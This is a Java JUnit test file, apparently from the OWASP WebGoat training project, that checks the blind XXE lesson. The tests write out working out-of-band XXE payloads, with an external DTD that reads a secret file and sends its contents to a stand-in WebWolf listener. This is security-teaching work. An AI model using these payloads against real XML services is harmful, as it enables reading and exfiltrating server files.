package org.owasp.webgoat.xxe;

import com.github.tomakehurst.wiremock.WireMockServer;
import com.github.tomakehurst.wiremock.client.WireMock;
import com.github.tomakehurst.wiremock.junit.WireMockRule;
import com.github.tomakehurst.wiremock.verification.LoggedRequest;
import org.hamcrest.CoreMatchers;
import org.junit.Rule;
import org.junit.jupiter.api.BeforeEach;
import org.junit.jupiter.api.Test;
import org.junit.jupiter.api.extension.ExtendWith;
import org.owasp.webgoat.plugins.LessonTest;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.beans.factory.annotation.Value;
import org.springframework.test.context.junit.jupiter.SpringExtension;
import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
import org.springframework.test.web.servlet.setup.MockMvcBuilders;

import java.io.File;
import java.util.List;

import static com.github.tomakehurst.wiremock.client.WireMock.aResponse;
import static com.github.tomakehurst.wiremock.client.WireMock.findAll;
import static com.github.tomakehurst.wiremock.client.WireMock.get;
import static com.github.tomakehurst.wiremock.client.WireMock.getRequestedFor;
import static com.github.tomakehurst.wiremock.client.WireMock.urlMatching;
import static com.github.tomakehurst.wiremock.core.WireMockConfiguration.options;
import static com.github.tomakehurst.wiremock.core.WireMockConfiguration.wireMockConfig;
import static org.assertj.core.api.Assertions.assertThat;
import static org.mockito.Mockito.when;
import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.status;

/**
 * @author nbaars
 * @since 5/4/17.
 */
@ExtendWith(SpringExtension.class)
public class BlindSendFileAssignmentTest extends LessonTest {

    @Autowired
    private XXE xxe;
    @Autowired
    private Comments comments;
    @Value("${webgoat.user.directory}")
    private String webGoatHomeDirectory;
    
    private int port;

    private WireMockServer webwolfServer;

    @BeforeEach
    public void setup() {
        this.webwolfServer = new WireMockServer(options().dynamicPort());
        webwolfServer.start();
        this.port = webwolfServer.port();
        when(webSession.getCurrentLesson()).thenReturn(xxe);
        this.mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();
    }

    @Test
    public void validCommentMustBeAdded() throws Exception {
        int nrOfComments = comments.getComments().size();
        mockMvc.perform(MockMvcRequestBuilders.post("/xxe/blind")
                .content("<comment><text>test</text></comment>"))

                .andExpect(status().isOk())
                .andExpect(jsonPath("$.feedback", CoreMatchers.is(messages.getMessage("assignment.not.solved"))));
        assertThat(comments.getComments().size()).isEqualTo(nrOfComments + 1);
    }

    @Test
    public void wrongXmlShouldGiveErrorBack() throws Exception {
        mockMvc.perform(MockMvcRequestBuilders.post("/xxe/blind")
                .content("<comment><text>test</ext></comment>"))

                .andExpect(status().isOk())
                .andExpect(jsonPath("$.feedback", CoreMatchers.is(messages.getMessage("assignment.not.solved"))))
                .andExpect(jsonPath("$.output", CoreMatchers.startsWith("javax.xml.bind.UnmarshalException\\n - with linked exception:\\n[javax.xml.stream.XMLStreamException: ParseError at [row,col]:[1,22]\\nMessage:")));
    }

    @Test
    public void simpleXXEShouldNotWork() throws Exception {
        File targetFile = new File(webGoatHomeDirectory, "/XXE/secret.txt");
        String content = "<?xml version=\"1.0\" standalone=\"yes\" ?><!DOCTYPE user [<!ENTITY root SYSTEM \"file:///%s\"> ]><comment><text>&root;</text></comment>";
        mockMvc.perform(MockMvcRequestBuilders.post("/xxe/blind")
                .content(String.format(content, targetFile.toString())))
                .andExpect(status().isOk());
        assertThat(comments.getComments()).extracting(c -> c.getText()).containsAnyOf("Nice try, you need to send the file to WebWolf");
    }

    @Test
    public void solve() throws Exception {
        File targetFile = new File(webGoatHomeDirectory, "/XXE/secret.txt");
        //Host DTD on WebWolf site
        String dtd = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n" +
                "<!ENTITY % file SYSTEM \"" + targetFile.toURI().toString() + "\">\n" +
                "<!ENTITY % all \"<!ENTITY send SYSTEM 'http://localhost:"+port+"/landing?text=%file;'>\">\n" +
                "%all;";
        webwolfServer.stubFor(get(WireMock.urlMatching("/files/test.dtd"))
                .willReturn(aResponse()
                        .withStatus(200)
                        .withBody(dtd)));
        webwolfServer.stubFor(get(urlMatching("/landing.*")).willReturn(aResponse().withStatus(200)));

        //Make the request from WebGoat
        String xml = "<?xml version=\"1.0\"?>" +
                "<!DOCTYPE comment [" +
                "<!ENTITY % remote SYSTEM \"http://localhost:"+port+"/files/test.dtd\">" +
                "%remote;" +
                "]>" +
                "<comment><text>test&send;</text></comment>";
        performXXE(xml);
    }

    @Test
    public void solveOnlyParamReferenceEntityInExternalDTD() throws Exception {
        File targetFile = new File(webGoatHomeDirectory, "/XXE/secret.txt");
        //Host DTD on WebWolf site
        String dtd = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n" +
                "<!ENTITY % all \"<!ENTITY send SYSTEM 'http://localhost:"+port+"/landing?text=%file;'>\">\n";
        webwolfServer.stubFor(get(WireMock.urlMatching("/files/test.dtd"))
                .willReturn(aResponse()
                        .withStatus(200)
                        .withBody(dtd)));
        webwolfServer.stubFor(get(urlMatching("/landing.*")).willReturn(aResponse().withStatus(200)));

        //Make the request from WebGoat
        String xml = "<?xml version=\"1.0\"?>" +
                "<!DOCTYPE comment [" +
                "<!ENTITY % file SYSTEM \"" + targetFile.toURI().toString() + "\">\n" +
                "<!ENTITY % remote SYSTEM \"http://localhost:"+port+"/files/test.dtd\">" +
                "%remote;" +
                "%all;" +
                "]>" +
                "<comment><text>test&send;</text></comment>";
        performXXE(xml);
    }

    private void performXXE(String xml) throws Exception {
        //Call with XXE injection
        mockMvc.perform(MockMvcRequestBuilders.post("/xxe/blind")
                .content(xml))

                .andExpect(status().isOk())
                .andExpect(jsonPath("$.feedback", CoreMatchers.is(messages.getMessage("assignment.not.solved"))));

        List<LoggedRequest> requests = webwolfServer.findAll(getRequestedFor(urlMatching("/landing.*")));
        assertThat(requests.size()).isEqualTo(1);
        String text = requests.get(0).getQueryParams().get("text").firstValue();

        //Call with retrieved text
        mockMvc.perform(MockMvcRequestBuilders.post("/xxe/blind")
                .content("<comment><text>" + text + "</text></comment>"))
                .andExpect(status().isOk())
                .andExpect(jsonPath("$.feedback", CoreMatchers.is(messages.getMessage("assignment.solved"))));
    }

}